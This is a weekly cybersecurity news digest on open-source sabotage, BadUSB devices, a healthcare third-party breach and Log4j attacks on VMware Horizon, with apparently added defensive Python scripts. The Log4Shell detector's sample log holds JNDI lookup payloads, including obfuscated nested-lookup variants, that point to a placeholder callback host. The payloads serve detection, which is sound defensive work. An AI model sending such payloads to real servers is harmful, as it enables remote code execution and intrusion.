Open-Source Sabotage 💣 BadUSB Attacks 🔌 Broward Breach 🏥 & VMware Horizon Hacked 🧑💻
HUB Weekly Digest of Cyber Security
Hi dear readers. Welcome to the HUB Weekly Digest, where we cover the top cyber security stories from the past week. This is the place to stay up to date not only on news stories, but also to get acquainted with best practices and mitigation methods, as well as our cutting-edge cybersecurity technologies.
This week our stories are:
💣 Open-source sabotage as a supply-chain attack
🔌 The hazards of BadUSBs and how to protect yourself against them
🏥 IT considerations for healthcare institutions
🧑💻 UK’s NHS issues a warning on Log4j vulnerability in VMware Horizon
💣 I’m Tellin’ Y’all, It’s an Open-Source Sabotage
The story of the open-source maintainer who turned on his own users has been circulating on the internet for the past week. For whatever reason, this developer decided it was a good idea to corrupt code that he wrote and that many people around the world depend on. The result was not pretty, with numerous applications that pulled the update having to be shut down (Sources: Bleeping Computer, Silicon Republic)
“The sabotaged versions cause applications to infinitely output strange letters and symbols, beginning with three lines of text that read ‘LIBERTY LIBERTY LIBERTY’.”
HUB’s perspective: This is, in effect, a classic supply-chain attack: the malicious code arrived through the normal update channel, published under the legitimate maintainer’s own account. When using open source, pin dependency versions instead of automatically pulling the latest release, and route every update through sandboxing and testing before it is deployed to production. Code review of the update’s diff and application testing should be done as well; note that a sandbox only catches this kind of sabotage if the tests actually exercise the affected library. HUB Security provides a mechanism to approve that the testing process has completed successfully before allowing updates into critical environments.
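The first gate described above can be automated. The script below is an added example, not code from the newsletter or from HUB Security: it reads an npm manifest and lock file (both constructed here for the demonstration, with made-up package names) and blocks a deployment if any dependency uses a floating version range, which is what lets a sabotaged release reach production unreviewed, or if a locked package carries no integrity hash, which is what lets a re-published tarball go unnoticed.

```python
"""Pre-deployment gate for npm dependencies: flag floating version ranges and
lock-file entries without an integrity hash.

Added example, not code from the newsletter or from HUB Security. The
package.json / package-lock.json documents below are constructed for the
demonstration; the semver-range syntax is npm's."""
import json
import re

# An exact pin is digits.digits.digits with an optional prerelease/build tag.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")

# Constructed manifest: one exact pin plus one example of each floating style.
PACKAGE_JSON = json.loads("""{
  "name": "demo-app",
  "dependencies": {
    "pinned-lib": "1.3.0",
    "floating-caret": "^1.4.0",
    "floating-tilde": "~2.1.0",
    "any-version": "*",
    "dist-tag": "latest",
    "git-dep": "github:someone/somerepo#main"
  }
}""")

# Constructed lock file (lockfileVersion 2 layout); one entry lacks "integrity".
PACKAGE_LOCK = json.loads("""{
  "lockfileVersion": 2,
  "packages": {
    "node_modules/pinned-lib": {"version": "1.3.0", "integrity": "sha512-AAAA"},
    "node_modules/floating-caret": {"version": "1.4.1"},
    "node_modules/floating-tilde": {"version": "2.1.2", "integrity": "sha512-BBBB"}
  }
}""")


def floating_dependencies(manifest: dict) -> dict:
    """Return {name: specifier} for every dependency that is not an exact pin.

    Anything listed here lets `npm install` pick up whatever the maintainer
    publishes next, which is exactly how a sabotaged release gets deployed."""
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(manifest.get(section, {}))
    return {name: spec for name, spec in deps.items() if not EXACT_VERSION.match(spec)}


def unverified_lock_entries(lock: dict) -> list:
    """Names of locked packages that have no integrity (content hash) field.

    Without it, a tarball re-published under the same version is not detected."""
    missing = []
    for path, entry in lock.get("packages", {}).items():
        if not path:  # the root project entry ("") has no tarball to verify
            continue
        if "integrity" not in entry:
            missing.append(path.split("node_modules/")[-1])
    return missing


def gate_update(manifest: dict, lock: dict) -> list:
    """Findings a deployment gate would block on; an empty list means pass."""
    findings = [f"{n}: floating specifier '{s}'"
                for n, s in floating_dependencies(manifest).items()]
    findings += [f"{n}: lock entry has no integrity hash"
                 for n in unverified_lock_entries(lock)]
    return findings


if __name__ == "__main__":
    for finding in gate_update(PACKAGE_JSON, PACKAGE_LOCK):
        print("BLOCK:", finding)
```

Pinning alone does not make an update safe; it only guarantees that nothing changes until someone deliberately bumps the version, at which point the sandbox and test run described above decide whether the new release is allowed through.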
🔌 BadUSBs: How Severe Is Such an Attack & Defense Methods
Hackers can intrude in various ways; a phishing campaign is just one possibility. Privileged access can also be obtained using more ‘analog’ techniques. Mailing malicious USB devices is one such method, and it has acquired the name BadUSB. An innocent-looking envelope is delivered to the victim, purportedly from Amazon or another company. When the victim inserts the BadUSB into their computer, the device presents itself as a keyboard and types commands on the attacker’s behalf, so the attacker gains very broad access to resources, since he now effectively has hands on the device itself. (Source)
HUB’s perspective: Any USB attack begins with a lack of user awareness. All users in an organization should go through security awareness training and testing to make sure they do not fall for human-based attacks.
HUB Security constrains what even privileged users can do, and critical operations require a second approver. This reduces the risk of malware introduced by a USB device or other scams, because the malware would not be able to run unauthorized commands under the user’s privileges. The core concept behind this line of defense is to safeguard the organization’s most critical assets.
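A technical control that complements awareness training is to notice when a “keyboard” appears that the organization never issued, which is how a BadUSB device looks to the operating system. The script below is an added example, not code from the newsletter or from HUB Security: it parses kernel log lines in the Linux `hid-generic` attach format (the lines here are constructed, and the DEAD:BEEF vendor:product pair is a placeholder) and reports any keyboard whose vendor:product ID is not on an assumed allowlist of issued hardware.

```python
"""Report newly attached USB keyboards that are not on the hardware allowlist.

A BadUSB device (a drive or cable whose firmware presents itself as a keyboard
and injects keystrokes) shows up to the OS as a HID keyboard attach event.

Added example, not code from the newsletter or from HUB Security. The kernel
log lines are constructed to follow the Linux `hid-generic` message format;
the allowlist of vendor:product IDs is an assumed site policy."""
import re

# Linux hid-generic attach line, e.g.
# hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1/input0
HID_ATTACH = re.compile(
    r"hid-generic 0003:(?P<vendor>[0-9A-F]{4}):(?P<product>[0-9A-F]{4})\.\w+: "
    r"[^:]+: USB HID v[\d.]+ (?P<type>\w+) \[(?P<name>[^\]]*)\]"
)

# Assumed site policy: the keyboards the organisation actually issues.
ALLOWED_KEYBOARDS = {("046D", "C31C"), ("04D9", "0169")}

# Constructed log: the issued keyboard, a mouse, then a "storage stick" that
# also registers as a keyboard under a vendor:product pair nobody approved.
SAMPLE_DMESG = """\
[   12.401] usb 1-1: New USB device found, idVendor=046d, idProduct=c31c, bcdDevice=64.00
[   12.455] hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1/input0
[   12.460] hid-generic 0003:046D:C077.0002: input,hidraw1: USB HID v1.11 Mouse [Logitech USB Optical Mouse] on usb-0000:00:14.0-2/input0
[ 3581.102] usb 1-3: New USB device found, idVendor=dead, idProduct=beef, bcdDevice=1.00
[ 3581.150] usb-storage 1-3:1.0: USB Mass Storage device detected
[ 3581.301] hid-generic 0003:DEAD:BEEF.0003: input,hidraw2: USB HID v1.01 Keyboard [USB Keyboard] on usb-0000:00:14.0-3/input1
"""


def keyboards_from_log(text: str) -> list:
    """Return (vendor, product, name) for every HID keyboard attach event."""
    found = []
    for line in text.splitlines():
        m = HID_ATTACH.search(line)
        if m and m.group("type") == "Keyboard":
            found.append((m.group("vendor"), m.group("product"), m.group("name")))
    return found


def unexpected_keyboards(text: str, allowlist=ALLOWED_KEYBOARDS) -> list:
    """Keyboards whose vendor:product pair is not an approved peripheral."""
    return [kb for kb in keyboards_from_log(text) if (kb[0], kb[1]) not in allowlist]


if __name__ == "__main__":
    for vendor, product, name in unexpected_keyboards(SAMPLE_DMESG):
        print(f"ALERT: unapproved keyboard {vendor}:{product} ({name}) attached")
```

The caveat: a vendor:product allowlist is a detection aid, not a block, and a BadUSB can be programmed to spoof the IDs of an issued keyboard. It is most useful as an alert feeding the same approval workflow described above, alongside a policy that refuses unknown HID devices outright.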
🏥 It’s a Hack via a 3rd-Party (and I’ll Cry If I Want To)
Another healthcare institution is in the news as a result of a data breach. This time it is Broward Health. One of its third-party medical providers, who had network access, was hacked, and as a result the personal information of around 1.3 million people was stolen. The stolen data included dates of birth, physical addresses, financial or bank information, Social Security numbers, insurance information and account numbers, and medical information and history (condition, treatment, and so on). (Source)
“Stolen data is often bartered privately in hidden dark web forums, so it could be too early to see signs of abuse in the wild”
HUB’s perspective: Healthcare is a prime target for attacks. Healthcare organizations run lean IT operations and therefore rely on many third parties for daily administration and maintenance. Every third party should be treated as an IT user and subject to the same controls. MFA or passwordless authentication is paramount.
HUB Security’s solution treats all users the same: if specific access has not been defined, a user does not get into the critical application or its data. In addition, all communications are authenticated and signed, assuring the authenticity of every operation. A hacker therefore could not reach the system and data even after compromising one of the third-party systems.
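The two properties just described, default-deny access for third-party accounts and a signature on every operation, can be illustrated in a few dozen lines. The code below is an added example, not HUB Security’s product code or Broward Health’s environment: it uses HMAC-SHA256 over a canonical request string as a stand-in signing scheme, and the principals, keys, grants and resource names are all constructed.

```python
"""Default-deny access control for third-party accounts plus per-request
signing, so a compromised supplier system cannot reach data it was never
granted and cannot replay or alter a captured request.

Added example, not code from the newsletter or from HUB Security. Key
material, the access table and the requests are constructed; HMAC-SHA256
over a canonical string stands in for the signing scheme."""
import hashlib
import hmac
import time

# Constructed shared secrets, one per third-party integration account.
KEYS = {
    "radiology-vendor": b"constructed-secret-1",
    "billing-vendor": b"constructed-secret-2",
}

# Explicit grants as (principal, action, resource). Anything absent is denied.
GRANTS = {
    ("radiology-vendor", "read", "imaging/reports"),
    ("billing-vendor", "read", "billing/invoices"),
}

MAX_SKEW_SECONDS = 300   # reject requests older than five minutes
_seen_nonces = set()     # replay cache (in-memory for the demo)


def canonical(principal, action, resource, ts, nonce) -> bytes:
    # Fixed field order and separator: the signature covers every field
    # the authorization decision depends on.
    return f"{principal}\n{action}\n{resource}\n{ts}\n{nonce}".encode()


def sign(principal, action, resource, ts, nonce) -> str:
    msg = canonical(principal, action, resource, ts, nonce)
    return hmac.new(KEYS[principal], msg, hashlib.sha256).hexdigest()


def make_request(principal, action, resource, ts, nonce) -> dict:
    """What a legitimate third-party client sends (assumed wire format)."""
    return {"principal": principal, "action": action, "resource": resource,
            "ts": ts, "nonce": nonce,
            "sig": sign(principal, action, resource, ts, nonce)}


def authorize(req: dict, now=None) -> tuple:
    """Return (allowed, reason). Every check must pass; the default is deny."""
    now = time.time() if now is None else now
    principal = req.get("principal")
    if principal not in KEYS:
        return False, "unknown principal"
    expected = sign(principal, req["action"], req["resource"], req["ts"], req["nonce"])
    if not hmac.compare_digest(expected, req.get("sig", "")):
        return False, "bad signature"         # tampered, or not from the key holder
    if abs(now - req["ts"]) > MAX_SKEW_SECONDS:
        return False, "stale request"
    if req["nonce"] in _seen_nonces:
        return False, "replayed request"
    _seen_nonces.add(req["nonce"])
    if (principal, req["action"], req["resource"]) not in GRANTS:
        return False, "no grant for this action/resource"   # default deny
    return True, "ok"


if __name__ == "__main__":
    good = make_request("radiology-vendor", "read", "imaging/reports", int(time.time()), "demo-1")
    print(authorize(good))
    # An attacker on the radiology vendor's box re-targets the signed request.
    good["resource"] = "patients/records"
    print(authorize(good))
```

The order of the checks matters: the signature is verified before anything else, so a tampered request never consumes a nonce or touches the grant table, and the grant table is consulted last, so a valid, fresh request from a real supplier still gets nothing beyond what was explicitly granted to it.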
🧑💻 Hackers Find New Log4j Exploits — This Time it’s VMware
Hackers are actively targeting Log4j vulnerabilities, according to the UK’s National Health Service (NHS). An ‘unknown threat group’ is attempting to exploit a Log4j vulnerability in VMware Horizon servers to plant web shells that could be used to distribute malware and ransomware, steal confidential information, and carry out other malicious actions. (Source)
“The attacks being warned against exploit the Log4Shell vulnerability in the Apache Tomcat service embedded within VMware Horizon…the attack uses the Lightweight Directory Access Protocol (LDAP) to execute a malicious Java file that injects a web shell into the VM Blast Secure Gateway service”
HUB’s perspective: This shows that even tight control of desktops and clients (which is good security practice) is not sufficient to protect applications and data, because here the vulnerable component is the server itself. HUB Security protects your core applications and data without any way to bypass the security controls.
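The attack quoted above starts with a request carrying a `${jndi:ldap://…}` lookup string that Log4j resolves. The detector below is an added example, not code from the newsletter, the NHS or VMware: it scans web-server access log lines (constructed here in Apache combined-log style, with 203.0.113.99:1389 as a placeholder callback address) and, before matching, unwinds the nested-lookup and percent-encoding obfuscations that defeat a naive search for the literal text “jndi:ldap”. It goes slightly beyond the quoted case by matching any JNDI scheme, not only LDAP.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in web-server access logs,
including the nested-lookup obfuscations used to evade a naive search for the
literal text "jndi:ldap".

Added example, not code from the newsletter, the NHS or VMware. The access-log
lines are constructed in Apache combined-log style and the callback address
203.0.113.99:1389 is a documentation-range placeholder."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further ${ inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup with any scheme; the attack described by the NHS used ldap://.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*[a-z]+\s*:")
_CALLBACK = re.compile(r"jndi\s*:\s*[a-z]+://([^/\s}\]]+)")


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would before the JNDI step."""
    body = m.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j}: default value wins
        return body.rsplit(":-", 1)[1]
    key, sep, rest = body.partition(":")
    if sep and key.lower() == "lower":    # ${lower:J} -> j
        return rest.lower()
    if sep and key.lower() == "upper":    # ${upper:j} -> J
        return rest.upper()
    return m.group(0)                     # e.g. ${jndi:...}: leave for the detector


def normalise(s: str) -> str:
    """Percent-decode twice, collapse nested lookups to their result, lowercase."""
    s = unquote(unquote(s))
    prev = None
    while prev != s:                      # repeat until no inner lookup changes
        prev = s
        s = _INNER.sub(_resolve, s)
    return s.lower()


# Constructed log: one benign request, then the plain payload, a URL-encoded
# one in the query string, and two nested-lookup variants in header fields.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [10/Jan/2022:10:15:01 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Jan/2022:10:15:07 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.12 - - [10/Jan/2022:10:15:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.99%3A1389%2Fb%7D HTTP/1.1" 400 12 "-" "curl/7.68"
203.0.113.13 - - [10/Jan/2022:10:15:11 +0000] "GET /portal/ HTTP/1.1" 200 5123 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.99:1389/c}" "Mozilla/5.0"
203.0.113.14 - - [10/Jan/2022:10:15:13 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.99:1389/d}"
"""


def scan_access_log(text: str) -> list:
    """Return (source_ip, callback_host) for every line carrying a JNDI lookup."""
    hits = []
    for line in text.splitlines():
        norm = normalise(line)
        if _JNDI.search(norm):
            src = line.split(" ", 1)[0]
            cb = _CALLBACK.search(norm)
            hits.append((src, cb.group(1) if cb else None))
    return hits


if __name__ == "__main__":
    for src, cb in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"ALERT: Log4Shell lookup from {src}, callback {cb}")
```

This covers the inbound side only. Confirming the web shell the NHS describes means checking the Horizon host itself, and detection is no substitute for applying VMware’s Log4j fixes for Horizon; the callback host:port the scanner extracts is the indicator worth blocking at the egress firewall while that happens.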